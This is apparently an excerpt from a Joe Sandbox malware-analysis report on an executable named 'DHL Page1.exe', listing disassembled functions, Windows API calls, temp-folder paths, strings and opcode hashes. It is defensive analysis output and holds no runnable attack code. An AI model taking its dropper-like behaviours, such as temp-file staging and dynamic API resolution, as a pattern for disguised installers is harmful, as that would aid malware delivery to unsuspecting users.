                                              • String ID: unpacking data: %d%%$verifying installer: %d%%
                                              • API String ID: 1451636040-1158693248
                                              • Opcode ID: cd34b667c88f461d84bd87c456843896e1708f9162b963f3c6a51835bfa4288c
                                              • Instruction ID: 21dccee0f56e207788fa0171acdbed72568af18507d7a145866726ec9d514ae2
                                              • Opcode Fuzzy Hash: cd34b667c88f461d84bd87c456843896e1708f9162b963f3c6a51835bfa4288c
                                              • Instruction Fuzzy Hash: 12F0367054020CABDF205F50DD49BEE3B69FB40304F00803AFA05B51D0DBB95A658F99
                                              APIs
                                              • GlobalFree.KERNEL32(00000000), ref: 10002416
                                                • Part of subcall function 1000122C: lstrcpynW.KERNEL32(00000000,?,100012DF,00000019,100011BE,-000000A0), ref: 1000123C
                                              • GlobalAlloc.KERNEL32(00000040), ref: 10002397
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023B2
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.123239636452.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                              • Associated: 00000000.00000002.123239605456.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.123239665702.0000000010003000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.123239691897.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_10000000_DHL Page1.jbxd
                                              Similarity
                                              • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                              • String ID:
                                              • API String ID: 4216380887-0
                                              • Opcode ID: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
                                              • Instruction ID: a8798eece1b67337def5fc6f06e905ed3cc6fca3e5836deafc22007a072d802d
                                              • Opcode Fuzzy Hash: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
                                              • Instruction Fuzzy Hash: A14190B1508305EFF320DF24D885AAA77F8FB883D0F50452DF9468619ADB34AA54DB61
                                              APIs
                                                • Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                              • GlobalFree.KERNEL32(?), ref: 10002572
                                              • GlobalFree.KERNEL32(00000000), ref: 100025AD
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.123239636452.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                              • Associated: 00000000.00000002.123239605456.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.123239665702.0000000010003000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.123239691897.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_10000000_DHL Page1.jbxd
                                              Similarity
                                              • API ID: Global$Free$Alloc
                                              • String ID:
                                              • API String ID: 1780285237-0
                                              • Opcode ID: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
                                              • Instruction ID: 76257f5bf6759f365bfcd452de7d39bb0b2322773c3eba187a8a795e141f7608
                                              • Opcode Fuzzy Hash: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
                                              • Instruction Fuzzy Hash: 6831DE71504A21EFF321CF14CCA8E2B7BF8FB853D2F114529FA40961A8CB319851DB69
                                              APIs
                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402917
                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 00402933
                                              • GlobalFree.KERNEL32(?), ref: 0040296C
                                              • GlobalFree.KERNEL32(00000000), ref: 0040297F
                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402997
                                              • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 004029AB
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd
                                              Similarity
                                              • API ID: Global$AllocFree$CloseDeleteFileHandle
                                              • String ID:
                                              • API String ID: 2667972263-0
                                              • Opcode ID: 4da22ef413c1044a218c5b7a798ca91b963ccb849e4d2dcca53082b716824a3e
                                              • Instruction ID: 279f8726a3ce0b3592a3b9e8208213fc653f4cfc6ff5f76fbdf56dc0d25ebd4d
                                              • Opcode Fuzzy Hash: 4da22ef413c1044a218c5b7a798ca91b963ccb849e4d2dcca53082b716824a3e
                                              • Instruction Fuzzy Hash: EE218D71800524BBDF116FA5DE49D9E7E79EF09368F10023AF5507A2E1CB794D418B98
                                              APIs
                                              • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsv4331.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsv4331.tmp\System.dll,00000400,?,?,00000021), ref: 004025FE
                                              • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsv4331.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsv4331.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsv4331.tmp\System.dll,00000400,?,?,00000021), ref: 00402609
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd
                                              Similarity
                                              • API ID: ByteCharMultiWidelstrlen
                                              • String ID: C:\Users\user\AppData\Local\Temp\nsv4331.tmp$C:\Users\user\AppData\Local\Temp\nsv4331.tmp\System.dll
                                              • API String ID: 3109718747-918722644
                                              • Opcode ID: 83731c5805307a76dbb810d89470d25b030408685d051451989fd3234cd2a8da
                                              • Instruction ID: 217cd11262b5447a5c9dc46d06adace92062a2cc882c1e35563c8d2f4c0daf69
                                              • Opcode Fuzzy Hash: 83731c5805307a76dbb810d89470d25b030408685d051451989fd3234cd2a8da
                                              • Instruction Fuzzy Hash: 0B11C832A45714BEDB106FB1CE89E9F7665AF04358F20443BF502B61C1DAFC89824A9E
                                              APIs
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002148,?,00000808), ref: 10001617
                                              • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002148,?,00000808), ref: 1000161E
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002148,?,00000808), ref: 10001632
                                              • GetProcAddress.KERNEL32(10002148,00000000), ref: 10001639
                                              • GlobalFree.KERNEL32(00000000), ref: 10001642
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.123239636452.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                              • Associated: 00000000.00000002.123239605456.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.123239665702.0000000010003000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.123239691897.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_10000000_DHL Page1.jbxd
                                              Similarity
                                              • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                              • String ID:
                                              • API String ID: 1148316912-0
                                              • Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                              • Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
                                              • Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                              • Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1
                                              APIs
                                              • lstrlenW.KERNEL32(0042D288,0042D288,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,-00436000), ref: 00404BF0
                                              • wsprintfW.USER32 ref: 00404BF9
                                              • SetDlgItemTextW.USER32(?,0042D288), ref: 00404C0C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd
                                              Similarity
                                              • API ID: ItemTextlstrlenwsprintf
                                              • String ID: %u.%u%s%s
                                              • API String ID: 3540041739-3551169577
                                              • Opcode ID: 3f95536588dffc27d7d1078d17c3f49a5e2063f4eec659c515b469063da87ecf
                                              • Instruction ID: ea04438874c8ccc674b692fe1e63f534d557bd3478eb06cd7af389f67dcbe87d
                                              • Opcode Fuzzy Hash: 3f95536588dffc27d7d1078d17c3f49a5e2063f4eec659c515b469063da87ecf
                                              • Instruction Fuzzy Hash: 1711E773A0412877DB106AAD9C42F9E329CDF85374F250237FE25F21D1DA78D82182E8
                                              APIs
                                              • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403459,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403694), ref: 00405BEE
                                              • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403459,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403694), ref: 00405BF8
                                              • lstrcatW.KERNEL32(?,0040A014), ref: 00405C0A
                                              Strings
                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405BE8
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd
                                              Similarity
                                              • API ID: CharPrevlstrcatlstrlen
                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                              • API String ID: 2659869361-3355392842
                                              • Opcode ID: 50926409037afd5c3b117ee0fc1a0f088670877cc81c495d68363141157855c1
                                              • Instruction ID: a1155a52877bfb7c642b443cd4294b287dd5c95a49c3c648eb0d773082088996
                                              • Opcode Fuzzy Hash: 50926409037afd5c3b117ee0fc1a0f088670877cc81c495d68363141157855c1
                                              • Instruction Fuzzy Hash: CFD0A731105634AAC2217B448D04CDF729C9F86304341407FF501B30A5C77C5D5187FD
                                              APIs
                                              • CloseHandle.KERNEL32(00000234,C:\Users\user\AppData\Local\Temp\,004037BE,?), ref: 0040399D
                                              • CloseHandle.KERNEL32(000002B0,C:\Users\user\AppData\Local\Temp\,004037BE,?), ref: 004039B1
                                              Strings
                                              • C:\Users\user\AppData\Local\Temp\nsv4331.tmp, xrefs: 004039C1
                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00403990
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd
                                              Similarity
                                              • API ID: CloseHandle
                                              • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsv4331.tmp
                                              • API String ID: 2962429428-1146303357
                                              • Opcode ID: e8f7966e18452049c2eee85f2c68902c91fb1c5427af02adfc640e1c3e42607e
                                              • Instruction ID: c599e588a799a675439da4f983f20d7a023f6578fa93528b29830c28325af9c2
                                              • Opcode Fuzzy Hash: e8f7966e18452049c2eee85f2c68902c91fb1c5427af02adfc640e1c3e42607e
                                              • Instruction Fuzzy Hash: 8DE0867194471496C130AF7CBD4A9863B286B453367244326F078F60F0C7789E574E9D
                                              APIs
                                              • SetWindowTextW.USER32(00000000,00433F20), ref: 00403DEB
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd
                                              Similarity
                                              • API ID: TextWindow
                                              • String ID: "C:\Users\user\Desktop\DHL Page1.exe"$1033
                                              • API String ID: 530164218-3746646515
                                              • Opcode ID: 30c98123a0ff00d7e3950788fea22d971f0637cc6565b2b7779c6d104cec89da
                                              • Instruction ID: 628123f554ceb20700e8963d8978a75a89e427f903bffb9b26901f46d3257fe5
                                              • Opcode Fuzzy Hash: 30c98123a0ff00d7e3950788fea22d971f0637cc6565b2b7779c6d104cec89da
                                              • Instruction Fuzzy Hash: B511D531A006119BC720DF15DC809777BADEFC9719729827FE901A73E1DB39AD028798
                                              APIs
                                              • IsWindowVisible.USER32(?), ref: 00405336
                                              • CallWindowProcW.USER32(?,?,?,?), ref: 00405387
                                                • Part of subcall function 00404344: SendMessageW.USER32(000103D6,00000000,00000000,00000000), ref: 00404356
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd
                                              Similarity
                                              • API ID: Window$CallMessageProcSendVisible
                                              • String ID:
                                              • API String ID: 3748168415-3916222277
                                              • Opcode ID: 83dda6701b15877ac1436a8efcde87d2249ca99db9eb141d4984d101aee1882c
                                              • Instruction ID: 127a6563868a7d53e28ac38c21bc59c6fcf94c80a0189a6920e26a43f7176097
                                              • Opcode Fuzzy Hash: 83dda6701b15877ac1436a8efcde87d2249ca99db9eb141d4984d101aee1882c
                                              • Instruction Fuzzy Hash: 71017171900A0DEBEF305F61DD81E9B3625EB84794F504137FE14751D0C7BA8C929E69
                                              APIs
                                              • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402F41,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\DHL Page1.exe,C:\Users\user\Desktop\DHL Page1.exe,80000000,00000003), ref: 00405C3A
                                              • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F41,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\DHL Page1.exe,C:\Users\user\Desktop\DHL Page1.exe,80000000,00000003), ref: 00405C4A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd
                                              Similarity
                                              • API ID: CharPrevlstrlen
                                              • String ID: C:\Users\user\Desktop
                                              • API String ID: 2709904686-3370423016
                                              • Opcode ID: 1e2f59ad4ff0707ecda417660e1f53ddee00da6e1af2314932cd9a88429354c1
                                              • Instruction ID: 48333f3730542792406d75f574d4279f727c9272e6f72c0639f01683d3746b3f
                                              • Opcode Fuzzy Hash: 1e2f59ad4ff0707ecda417660e1f53ddee00da6e1af2314932cd9a88429354c1
                                              • Instruction Fuzzy Hash: B7D0A7B3414A30DAE3127704DD41D9F73ACEF12304746446AF940A7165D7785CC18BEC
                                              APIs
                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
                                              • GlobalFree.KERNEL32(00000000), ref: 100011C7
                                              • GlobalFree.KERNEL32(00000000), ref: 100011D9
                                              • GlobalFree.KERNEL32(?), ref: 10001203
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.123239636452.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                              • Associated: 00000000.00000002.123239605456.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.123239665702.0000000010003000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.123239691897.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_10000000_DHL Page1.jbxd
                                              Similarity
                                              • API ID: Global$Free$Alloc
                                              • String ID:
                                              • API String ID: 1780285237-0
                                              • Opcode ID: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                              • Instruction ID: f345eba8489605592ce73ef35c78e6b42925bf5f5eceaf1f60f0973e38c56604
                                              • Opcode Fuzzy Hash: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                              • Instruction Fuzzy Hash: AE318FF6904211DBF314CF64DC859EA77E8EB853D0B12452AFB45E726CEB34E8018765
                                              APIs
                                              • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040604F,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D7E
                                              • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405D96
                                              • CharNextA.USER32(00000000,?,00000000,0040604F,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405DA7
                                              • lstrlenA.KERNEL32(00000000,?,00000000,0040604F,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405DB0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd
                                              Similarity
                                              • API ID: lstrlen$CharNextlstrcmpi
                                              • String ID:
                                              • API String ID: 190613189-0
